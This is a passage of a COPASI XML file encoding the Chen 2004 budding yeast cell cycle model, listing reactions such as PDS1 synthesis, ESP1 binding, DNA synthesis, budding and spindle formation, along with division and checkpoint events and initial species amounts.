<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:2.7.11.1" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0001100" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006469" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_13" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_9" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4287" name="ki15" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_127">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_722">
<SourceParameter reference="Metabolite_13"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_718">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_726">
<SourceParameter reference="ModelValue_107"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_105" name="PPX synthesis" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_105">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:ec-code:3.6.1.11" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_135" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4286" name="ksppx" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_128">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_724">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_716">
<SourceParameter reference="ModelValue_142"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_106" name="degradation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_106">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_135" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4285" name="Vdppx" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_129">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_712">
<SourceParameter reference="Metabolite_135"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_708">
<SourceParameter reference="ModelValue_164"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_728">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_107" name="PDS1 synthesis" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_107">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0006412" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_131" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_141" stoichiometry="1"/>
<Modifier metabolite="Metabolite_121" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4284" name="ks1pds_p_p" value="1"/>
<Constant key="Parameter_4283" name="ks2pds_p_p" value="1"/>
<Constant key="Parameter_4282" name="kspds_p" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_130">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_737">
<SourceParameter reference="Metabolite_121"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_731">
<SourceParameter reference="Metabolite_141"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_733">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_720">
<SourceParameter reference="ModelValue_122"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_735">
<SourceParameter reference="ModelValue_125"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_729">
<SourceParameter reference="ModelValue_141"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_108" name="degradation_2" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_108">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_131" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4281" name="Vdpds" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_131">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_734">
<SourceParameter reference="Metabolite_131"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_738">
<SourceParameter reference="ModelValue_165"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_730">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_109" name="Degradation of PDS1 in PE" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_109">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0030163" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0051437" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_133" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_101" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4280" name="Vdpds" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_132">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_736">
<SourceParameter reference="Metabolite_133"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_727">
<SourceParameter reference="ModelValue_165"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_740">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_110" name="Assoc. with ESP1 to form PE" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_110">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0005515" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043027" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043623" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_131" stoichiometry="1"/>
<Substrate metabolite="Metabolite_101" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_133" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4279" name="kasesp" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_133">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_745">
<SourceParameter reference="Metabolite_101"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_732">
<SourceParameter reference="Metabolite_131"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_743">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_741">
<SourceParameter reference="ModelValue_67"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_111" name="Disso. from PE" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_111">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043280" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0043624" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_133" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_131" stoichiometry="1"/>
<Product metabolite="Metabolite_101" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4380" name="kdiesp" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_134">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_742">
<SourceParameter reference="Metabolite_133"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_747">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_746">
<SourceParameter reference="ModelValue_93"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_112" name="DNA synthesis" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_112">
<CopasiMT:isVersionOf>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0000082" />
<rdf:li rdf:resource="urn:miriam:obo.go:GO%3A0006261" />
</rdf:Bag>
</CopasiMT:isVersionOf>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_129" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_93" stoichiometry="1"/>
<Modifier metabolite="Metabolite_89" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4379" name="eorib2" value="1"/>
<Constant key="Parameter_4378" name="eorib5" value="1"/>
<Constant key="Parameter_4377" name="ksori" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_135">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_756">
<SourceParameter reference="Metabolite_89"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_750">
<SourceParameter reference="Metabolite_93"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_752">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_754">
<SourceParameter reference="ModelValue_32"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_744">
<SourceParameter reference="ModelValue_33"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_748">
<SourceParameter reference="ModelValue_140"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_113" name="Negative regulation of DNA synthesis" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_113">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0008156" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_129" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4376" name="kdori" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_136">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_753">
<SourceParameter reference="Metabolite_129"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_749">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_757">
<SourceParameter reference="ModelValue_100"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_114" name="Budding" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_114">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0045782" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_41" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_97" stoichiometry="1"/>
<Modifier metabolite="Metabolite_99" stoichiometry="1"/>
<Modifier metabolite="Metabolite_93" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4375" name="ebudb5" value="1"/>
<Constant key="Parameter_4374" name="ebudn2" value="1"/>
<Constant key="Parameter_4373" name="ebudn3" value="1"/>
<Constant key="Parameter_4372" name="ksbud" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_137">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_769">
<SourceParameter reference="Metabolite_93"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_759">
<SourceParameter reference="Metabolite_97"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_765">
<SourceParameter reference="Metabolite_99"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_761">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_767">
<SourceParameter reference="ModelValue_15"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_755">
<SourceParameter reference="ModelValue_16"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_763">
<SourceParameter reference="ModelValue_17"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_739">
<SourceParameter reference="ModelValue_130"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_115" name="Negative regulation of Cell budding" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_115">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0045781" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_41" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4371" name="kdbud" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_138">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_766">
<SourceParameter reference="Metabolite_41"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_762">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_770">
<SourceParameter reference="ModelValue_89"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_116" name="Spindle formation" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_116">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0051225" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfProducts>
<Product metabolite="Metabolite_149" stoichiometry="1"/>
</ListOfProducts>
<ListOfModifiers>
<Modifier metabolite="Metabolite_89" stoichiometry="1"/>
</ListOfModifiers>
<ListOfConstants>
<Constant key="Parameter_4370" name="Jspn" value="1"/>
<Constant key="Parameter_4369" name="ksspn" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_139">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_768">
<SourceParameter reference="Metabolite_89"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_751">
<SourceParameter reference="ModelValue_54"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_772">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_760">
<SourceParameter reference="ModelValue_143"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_117" name="Spindle disassembly" reversible="false" fast="false">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_117">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0051228" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_149" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4368" name="kdspn" value="1"/>
</ListOfConstants>
<KineticLaw function="Function_140">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_758">
<SourceParameter reference="Metabolite_149"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_774">
<SourceParameter reference="Compartment_3"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_773">
<SourceParameter reference="ModelValue_103"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
</ListOfReactions>
<ListOfEvents>
<Event key="Event_2" name="reset ORI" fireAtInitialTime="0" persistentTrigger="0">
<TriggerExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>-<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[KEZ2],Reference=Value> lt 0
</TriggerExpression>
<ListOfAssignments>
<Assignment targetKey="Metabolite_129">
<Expression>
0/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
</ListOfAssignments>
</Event>
<Event key="Event_0" name="start DNA synthesis" fireAtInitialTime="0" persistentTrigger="0">
<TriggerExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[ORI],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>-1 gt 0
</TriggerExpression>
<ListOfAssignments>
<Assignment targetKey="Metabolite_117">
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mad2h],Reference=Value>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
<Assignment targetKey="Metabolite_45">
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[bub2h],Reference=Value>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
</ListOfAssignments>
</Event>
<Event key="Event_3" name="spindle checkpoint" fireAtInitialTime="0" persistentTrigger="0">
<TriggerExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SPN],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>-1 gt 0
</TriggerExpression>
<ListOfAssignments>
<Assignment targetKey="Metabolite_117">
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[mad2l],Reference=Value>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
<Assignment targetKey="Metabolite_115">
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[lte1h],Reference=Value>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
<Assignment targetKey="Metabolite_45">
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[bub2l],Reference=Value>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
</ListOfAssignments>
</Event>
<Event key="Event_4" name="cell division" fireAtInitialTime="0" persistentTrigger="0">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Event_4">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2011-03-02T13:14:05Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<TriggerExpression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>-<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[KEZ],Reference=Value> lt 0
</TriggerExpression>
<ListOfAssignments>
<Assignment targetKey="Metabolite_119">
<Expression>
(1-<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[F],Reference=Value>)*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MASS],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
<Assignment targetKey="Metabolite_115">
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[lte1l],Reference=Value>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
<Assignment targetKey="Metabolite_41">
<Expression>
0/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
<Assignment targetKey="Metabolite_149">
<Expression>
0/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Assignment>
<Assignment targetKey="ModelValue_173">
<Expression>
if(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[1stDivisionTime],Reference=Value> lt 0,<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time>,<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[1stDivisionTime],Reference=Value>)
</Expression>
</Assignment>
<Assignment targetKey="ModelValue_176">
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time>-<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[T0],Reference=Value>
</Expression>
</Assignment>
<Assignment targetKey="ModelValue_175">
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Reference=Time>
</Expression>
</Assignment>
</ListOfAssignments>
</Event>
</ListOfEvents>
<ListOfModelParameterSets activeSet="ModelParameterSet_1">
<ModelParameterSet key="ModelParameterSet_1" name="Initial State">
<ModelParameterGroup cn="String=Initial Time" type="Group">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU" value="0" type="Model" simulationType="time"/>
</ModelParameterGroup>
<ModelParameterGroup cn="String=Initial Compartment Sizes" type="Group">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell]" value="1" type="Compartment" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="String=Initial Species Values" type="Group">
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BCK2]" value="2.769598672382914e+22" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BUB2]" value="1.204428300000005e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[BUD]" value="9.000829013319018e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2]" value="1.415750029349604e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2P]" value="5.428453477226389e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5]" value="6.3287734055348e+22" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5P]" value="2.307420732690804e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14]" value="1.80535936470497e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14T]" value="1.20442800000001e+24" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC15]" value="3.817302580975654e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC15i]" value="2.204838369841239e+23" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20]" value="2.29204033134851e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC20i]" value="6.649934635684339e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6]" value="1.747366772326145e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6P]" value="6.987702526155101e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6T]" value="2.925132390092359e+23" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDH1]" value="6.004823451606606e+23" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDH1i]" value="1.731804839342613e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CKIT]" value="5.698007708108632e+23" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2]" value="9.253339255958898e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2T]" value="2.669832374374183e+23" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5]" value="3.888445993186847e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5T]" value="6.954600729887336e+22" type="Species" simulationType="assignment"/>
